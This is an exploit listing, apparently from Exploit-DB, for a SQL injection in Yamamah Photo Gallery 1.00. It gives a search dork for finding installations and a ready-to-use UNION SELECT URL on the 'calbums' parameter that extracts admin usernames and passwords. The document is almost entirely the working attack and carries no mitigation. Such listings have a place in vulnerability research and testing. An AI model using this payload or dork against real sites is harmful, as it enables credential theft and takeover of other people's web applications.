Yamamah Photo Gallery 1.00 - 'calbums' SQL Injection

EDB-ID:

13857


Author:

CoBRa_21

Type:

webapps


Platform:

PHP

Date:

2010-06-13


##################################################################################################

Yamamah Photo Gallery 1.00 SQL Injection Vulnerability

##################################################################################################

Author : CoBRa_21

Script Home : http://www.yamamah.org/

Dork : "Powered By : Yamamah Version 1.00"

##################################################################################################

SQL Injection:

http://localhost/[path]/?calbums=-2 union select 0,1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13 from admin--

##################################################################################################